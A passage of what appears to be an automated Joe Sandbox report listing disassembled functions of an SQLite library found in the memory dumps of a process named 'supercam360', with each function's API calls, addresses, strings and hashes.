                                                    • Instruction ID: dba10035f3c017a022ff92dc0406edc4c972eb6647695f7afdbed5011b3e14eb
                                                    • Opcode Fuzzy Hash: 039a1925b88827ab71129b12bf0a0cfd7bb9a75e2f5fb5313a60c0869b9e4a18
                                                    • Instruction Fuzzy Hash: 9112E3B4A15218CFCB18CF98D480A9EBBF6BF98304F24855AD855AB319D774EC42CF90
                                                    APIs
                                                    • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091264D
                                                    • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912662
                                                    • sqlite3_malloc.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091273E
                                                    • sqlite3_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912753
                                                    • sqlite3_os_init.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912758
                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 60912803
                                                    • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091280E
                                                    • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091282A
                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 6091283F
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_freesqlite3_mallocsqlite3_mutex_freesqlite3_os_init
                                                    • String ID:
                                                    • API String ID: 3556715608-0
                                                    • Opcode ID: 7a5b012c4fe40a1866ea25e0c9ef8651b072e840c3be51a8f23ca71a75eb633f
                                                    • Instruction ID: 37d7613b282c24208f37f95ee69ae3eaf9c0527d79975c213f2f38643f7f707f
                                                    • Opcode Fuzzy Hash: 7a5b012c4fe40a1866ea25e0c9ef8651b072e840c3be51a8f23ca71a75eb633f
                                                    • Instruction Fuzzy Hash: FEA14A71A2C215CBEB009F69CC843257FE7B7A7318F10816DD415AB2A0E7B9DC95EB11
                                                    APIs
                                                    • sqlite3_malloc.SQLITE3 ref: 6095F645
                                                    • sqlite3_exec.SQLITE3 ref: 6095F686
                                                      • Part of subcall function 6094CBB8: sqlite3_log.SQLITE3 ref: 6094CBF8
                                                    • sqlite3_free_table.SQLITE3 ref: 6095F6A0
                                                    • sqlite3_mprintf.SQLITE3 ref: 6095F6C7
                                                      • Part of subcall function 609296AA: sqlite3_initialize.SQLITE3 ref: 609296B0
                                                      • Part of subcall function 609296AA: sqlite3_vmprintf.SQLITE3 ref: 609296CA
                                                    • sqlite3_free.SQLITE3 ref: 6095F6B4
                                                      • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                    • sqlite3_free.SQLITE3 ref: 6095F6D4
                                                    • sqlite3_free.SQLITE3 ref: 6095F6ED
                                                    • sqlite3_free_table.SQLITE3 ref: 6095F6FF
                                                    • sqlite3_realloc.SQLITE3 ref: 6095F71B
                                                    • sqlite3_free_table.SQLITE3 ref: 6095F72D
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_freesqlite3_free_table$sqlite3_execsqlite3_initializesqlite3_logsqlite3_mallocsqlite3_mprintfsqlite3_mutex_entersqlite3_reallocsqlite3_vmprintf
                                                    • String ID:
                                                    • API String ID: 1866449048-0
                                                    • Opcode ID: 2addae8d4502475aa330d0fbe12d9077f3fed0f055932ab6dac269a256a03500
                                                    • Instruction ID: 9ac78cbffd0e0cf27e5d0fdbf17c3a3d034f00011a14f89e76d08e502163788c
                                                    • Opcode Fuzzy Hash: 2addae8d4502475aa330d0fbe12d9077f3fed0f055932ab6dac269a256a03500
                                                    • Instruction Fuzzy Hash: 8751F1B49467099FDB01DF69D59178EBBF6FF68318F104429E884AB300D379D894CB91
                                                    APIs
                                                    • sqlite3_finalize.SQLITE3 ref: 609407B4
                                                      • Part of subcall function 6094064B: sqlite3_log.SQLITE3 ref: 60940672
                                                      • Part of subcall function 6094064B: sqlite3_log.SQLITE3 ref: 60940696
                                                    • sqlite3_finalize.SQLITE3 ref: 609407C2
                                                      • Part of subcall function 6094064B: sqlite3_mutex_enter.SQLITE3 ref: 609406A7
                                                    • sqlite3_finalize.SQLITE3 ref: 609407D0
                                                    • sqlite3_finalize.SQLITE3 ref: 609407DE
                                                    • sqlite3_finalize.SQLITE3 ref: 609407EC
                                                    • sqlite3_finalize.SQLITE3 ref: 609407FA
                                                    • sqlite3_finalize.SQLITE3 ref: 60940808
                                                    • sqlite3_finalize.SQLITE3 ref: 60940816
                                                    • sqlite3_finalize.SQLITE3 ref: 60940824
                                                    • sqlite3_free.SQLITE3 ref: 6094082C
                                                      • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_finalize$sqlite3_logsqlite3_mutex_enter$sqlite3_free
                                                    • String ID:
                                                    • API String ID: 14011187-0
                                                    • Opcode ID: d36625bd4fa8924ea0abcbec615d2e266582c2e39b3be902bd1f9101c01d6c45
                                                    • Instruction ID: 14c977e837db455c9c1ce3b69ce7d4e0fb0da6313972e550a4586d0eb1b189ee
                                                    • Opcode Fuzzy Hash: d36625bd4fa8924ea0abcbec615d2e266582c2e39b3be902bd1f9101c01d6c45
                                                    • Instruction Fuzzy Hash: F7116774504B008BCB50BF78C9C965877E9AFB5308F061978EC8A8F306EB34D4918B15
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $ AND $%s USING %sINDEX %s%s$%s USING AUTOMATIC %sINDEX%.0s%s$)><$0$ANY($COVERING $SCAN$SEARCH$rowid
                                                    • API String ID: 0-780898
                                                    • Opcode ID: d1d17e5dd7c74eae3224551f6f3ab351f201226dcaab78a09df61ec6b72ac00d
                                                    • Instruction ID: 1b008e11d07f16b9462ef115b46fd1892196ed4c5360d6a6f9a636b6bab85f9b
                                                    • Opcode Fuzzy Hash: d1d17e5dd7c74eae3224551f6f3ab351f201226dcaab78a09df61ec6b72ac00d
                                                    • Instruction Fuzzy Hash: 46D109B0A087099FD714CF99C19079DBBF2BFA8308F10886AE495AB355D774D982CF81
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: aolf$aolf$bolb$bolc$buod$buod$laer$laer$rahc$tni$txet
                                                    • API String ID: 0-2604012851
                                                    • Opcode ID: b472df4709d2161ac4da3e6dd873a69b8789eadb7617e1432b7f17fad04b9ea6
                                                    • Instruction ID: a78f5df49eecf700eafad7d6eadd6707640e608d2d263d021760269e78388884
                                                    • Opcode Fuzzy Hash: b472df4709d2161ac4da3e6dd873a69b8789eadb7617e1432b7f17fad04b9ea6
                                                    • Instruction Fuzzy Hash: 2D31B171A891458ADB21891C85503EE7FBB9BE3344F28902EC8B2DB246C735CCD0C3A2
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: memcmp$sqlite3_logsqlite3_mutex_try
                                                    • String ID: 0$SQLite format 3
                                                    • API String ID: 3174206576-3388949527
                                                    • Opcode ID: e2a376b1a29b79c4f9f51ec04e7584e9c4e5062bfe0a82991cc629df80cc0a0f
                                                    • Instruction ID: d3cc03899c2fb96d27ccc41cf7ad58ff30b38a29db2c3208110d6cb2c70dce50
                                                    • Opcode Fuzzy Hash: e2a376b1a29b79c4f9f51ec04e7584e9c4e5062bfe0a82991cc629df80cc0a0f
                                                    • Instruction Fuzzy Hash: A3028BB0A082659BDB09CF68D48178ABBF7FFA5308F148269E8459B345DB74DC85CF81
                                                    APIs
                                                    • sqlite3_value_text.SQLITE3 ref: 6095F030
                                                    • sqlite3_value_text.SQLITE3 ref: 6095F03E
                                                    • sqlite3_stricmp.SQLITE3 ref: 6095F0B3
                                                    • sqlite3_free.SQLITE3 ref: 6095F180
                                                      • Part of subcall function 6092E279: strcmp.MSVCRT ref: 6092E2AE
                                                      • Part of subcall function 6092E279: sqlite3_free.SQLITE3 ref: 6092E3A8
                                                    • sqlite3_free.SQLITE3 ref: 6095F1BD
                                                      • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                    • sqlite3_result_error_code.SQLITE3 ref: 6095F34E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_free$sqlite3_value_text$sqlite3_mutex_entersqlite3_result_error_codesqlite3_stricmpstrcmp
                                                    • String ID: |
                                                    • API String ID: 1576672187-2343686810
                                                    • Opcode ID: bd5e6f80f73383bab87bf36e59bc4c906ea1158fee4d4fada053c93264453b50
                                                    • Instruction ID: c4017fd8acd983bc841f22cdb0f4132ffe50c361176833da1127552c957ad2bb
                                                    • Opcode Fuzzy Hash: bd5e6f80f73383bab87bf36e59bc4c906ea1158fee4d4fada053c93264453b50
                                                    • Instruction Fuzzy Hash: B2B189B4A08308CBDB01CF69C491B9EBBF2BF68358F148968E854AB355D734EC55CB81
                                                    APIs
                                                    • sqlite3_file_control.SQLITE3 ref: 609537BD
                                                    • sqlite3_free.SQLITE3 ref: 60953842
                                                    • sqlite3_free.SQLITE3 ref: 6095387C
                                                      • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                    • sqlite3_stricmp.SQLITE3 ref: 609538D4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_free$sqlite3_file_controlsqlite3_mutex_entersqlite3_stricmp
                                                    • String ID: 6$timeout
                                                    • API String ID: 2671017102-3660802998
                                                    • Opcode ID: 8cffcba2199636318c40f61931f0f453c1b4c4e8a0677f5b7de6569c291e0b77
                                                    • Instruction ID: da3e9078838fdf1f068eeacc94130b5fe058058c2a53432068b0843c8cdd1fdd
                                                    • Opcode Fuzzy Hash: 8cffcba2199636318c40f61931f0f453c1b4c4e8a0677f5b7de6569c291e0b77
                                                    • Instruction Fuzzy Hash: 6CA11270A083198BDB15CF6AC88079EBBF6BFA9304F10846DE8589B354D774D885CF41
                                                    APIs
                                                    • sqlite3_snprintf.SQLITE3 ref: 6095D450
                                                      • Part of subcall function 60917354: sqlite3_vsnprintf.SQLITE3 ref: 60917375
                                                    • sqlite3_snprintf.SQLITE3 ref: 6095D4A1
                                                    • sqlite3_snprintf.SQLITE3 ref: 6095D525
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_snprintf$sqlite3_vsnprintf
                                                    • String ID: $)><$sqlite_master$sqlite_temp_master
                                                    • API String ID: 652164897-1572359634
                                                    • Opcode ID: 8bad6b48079287e07d66e35ebf7d727d8c0cc4a3de3635d3393f65d8d520b325
                                                    • Instruction ID: a98725bc65f6cff0ffebef66634980575a39ba2d787d432de3c608a01e11e389
                                                    • Opcode Fuzzy Hash: 8bad6b48079287e07d66e35ebf7d727d8c0cc4a3de3635d3393f65d8d520b325
                                                    • Instruction Fuzzy Hash: 5991F275E05219CFCB15CF98C48169DBBF2BFA9308F14845AE859AB314DB34ED46CB81
                                                    APIs
                                                    • sqlite3_value_text.SQLITE3 ref: 6091B06E
                                                    • sqlite3_result_error_toobig.SQLITE3 ref: 6091B178
                                                    • sqlite3_result_error_nomem.SQLITE3 ref: 6091B197
                                                    • sqlite3_result_text.SQLITE3 ref: 6091B5A3
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_result_error_nomemsqlite3_result_error_toobigsqlite3_result_textsqlite3_value_text
                                                    • String ID:
                                                    • API String ID: 2352520524-0
                                                    • Opcode ID: 91a3e282f54c964bbb8224fbc5594699699e4a7ba29507b0b3f6ff953b241f0e
                                                    • Instruction ID: 99f21b63ad5c9672efebb0dd762c853f70c7e366ddc85f9db9da2d733c13ec0c
                                                    • Opcode Fuzzy Hash: 91a3e282f54c964bbb8224fbc5594699699e4a7ba29507b0b3f6ff953b241f0e
                                                    • Instruction Fuzzy Hash: F9E16B71E4C2199BDB208F18C89039EBBF7AB65314F1584DAE8A857351D738DCC19F82
                                                    APIs
                                                      • Part of subcall function 609296D1: sqlite3_value_bytes.SQLITE3 ref: 609296F3
                                                      • Part of subcall function 609296D1: sqlite3_mprintf.SQLITE3 ref: 60929708
                                                      • Part of subcall function 609296D1: sqlite3_free.SQLITE3 ref: 6092971B
                                                    • sqlite3_exec.SQLITE3 ref: 6096A4D7
                                                      • Part of subcall function 6094CBB8: sqlite3_log.SQLITE3 ref: 6094CBF8
                                                    • sqlite3_result_text.SQLITE3 ref: 6096A5D3
                                                      • Part of subcall function 6096A38C: sqlite3_bind_int.SQLITE3 ref: 6096A3DE
                                                      • Part of subcall function 6096A38C: sqlite3_step.SQLITE3 ref: 6096A435
                                                      • Part of subcall function 6096A38C: sqlite3_reset.SQLITE3 ref: 6096A445
                                                    • sqlite3_exec.SQLITE3 ref: 6096A523
                                                    • sqlite3_exec.SQLITE3 ref: 6096A554
                                                    • sqlite3_exec.SQLITE3 ref: 6096A57F
                                                    • sqlite3_result_error_code.SQLITE3 ref: 6096A5E1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_exec$sqlite3_bind_intsqlite3_freesqlite3_logsqlite3_mprintfsqlite3_resetsqlite3_result_error_codesqlite3_result_textsqlite3_stepsqlite3_value_bytes
                                                    • String ID: optimize
                                                    • API String ID: 3659050757-3797040228
                                                    • Opcode ID: c770602c58b8b739d860714e2a7cbb539b0686760bc80d510edb2603001de118
                                                    • Instruction ID: 653702cfcd2f061f0588c77de086fc27204f9fc351fc8b4992cba684a546c14d
                                                    • Opcode Fuzzy Hash: c770602c58b8b739d860714e2a7cbb539b0686760bc80d510edb2603001de118
                                                    • Instruction Fuzzy Hash: E831C3B11187119FE310DF24C49570FBBE6ABA1368F10C91DF9968B350E7B9D8459F82
                                                    APIs
                                                    • sqlite3_column_blob.SQLITE3 ref: 609654FB
                                                    • sqlite3_column_bytes.SQLITE3 ref: 60965510
                                                    • sqlite3_reset.SQLITE3 ref: 60965556
                                                    • sqlite3_reset.SQLITE3 ref: 609655B8
                                                      • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                      • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                    • sqlite3_malloc.SQLITE3 ref: 60965655
                                                    • sqlite3_free.SQLITE3 ref: 60965714
                                                    • sqlite3_free.SQLITE3 ref: 6096574B
                                                      • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                    • sqlite3_free.SQLITE3 ref: 609657AA
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_free$sqlite3_mutex_entersqlite3_reset$sqlite3_column_blobsqlite3_column_bytessqlite3_mallocsqlite3_mutex_leave
                                                    • String ID:
                                                    • API String ID: 2722129401-0
                                                    • Opcode ID: 718344d9776843f9d3d0f11354c3fb96bdbf3732bae6ebd8df48c35682458f02
                                                    • Instruction ID: e3a8cc565ee031670952cbbbf81914cbe75110044a29491daaf6513bdc913a85
                                                    • Opcode Fuzzy Hash: 718344d9776843f9d3d0f11354c3fb96bdbf3732bae6ebd8df48c35682458f02
                                                    • Instruction Fuzzy Hash: BBD1D270E14219CFEB14CFA9C48469DBBF2BF68304F20856AD899AB346D774E845CF81
                                                    APIs
                                                    • sqlite3_malloc.SQLITE3 ref: 609645D9
                                                      • Part of subcall function 60928099: sqlite3_malloc.SQLITE3 ref: 609280ED
                                                    • sqlite3_free.SQLITE3 ref: 609647C5
                                                      • Part of subcall function 60963D35: memcmp.MSVCRT ref: 60963E74
                                                    • sqlite3_free.SQLITE3 ref: 6096476B
                                                      • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                    • sqlite3_free.SQLITE3 ref: 6096477B
                                                    • sqlite3_free.SQLITE3 ref: 60964783
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920726766.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920747761.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_60900000_supercam360.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_free$sqlite3_malloc$memcmpsqlite3_mutex_enter
                                                    • String ID:
                                                    • API String ID: 571598680-0
                                                    • Opcode ID: d604abe0313f10411a0f234c71df8e29ee85eaf68e2bcebad1bf05c151ae1b53
                                                    • Instruction ID: 53ad94a03898eae12f4127695087571842428d6fdffc19c65fee49adcf86f1ae
                                                    • Opcode Fuzzy Hash: d604abe0313f10411a0f234c71df8e29ee85eaf68e2bcebad1bf05c151ae1b53
                                                    • Instruction Fuzzy Hash: 5E91F674E14228CFEB14CFA9D890B9EBBB6BB99304F1085AAD849A7344D734DD81CF51
                                                    APIs
                                                    • sqlite3_mprintf.SQLITE3 ref: 60929761
                                                      • Part of subcall function 609296AA: sqlite3_initialize.SQLITE3 ref: 609296B0
                                                      • Part of subcall function 609296AA: sqlite3_vmprintf.SQLITE3 ref: 609296CA
                                                    • sqlite3_mprintf.SQLITE3 ref: 609297C8
                                                    • sqlite3_mprintf.SQLITE3 ref: 6092988B
                                                    • sqlite3_free.SQLITE3 ref: 609298A4
                                                    • sqlite3_free.SQLITE3 ref: 609298AC
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2920628436.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                    • Associated: 00000005.00000002.2920609701.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920677026.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920692864.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2920710209.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
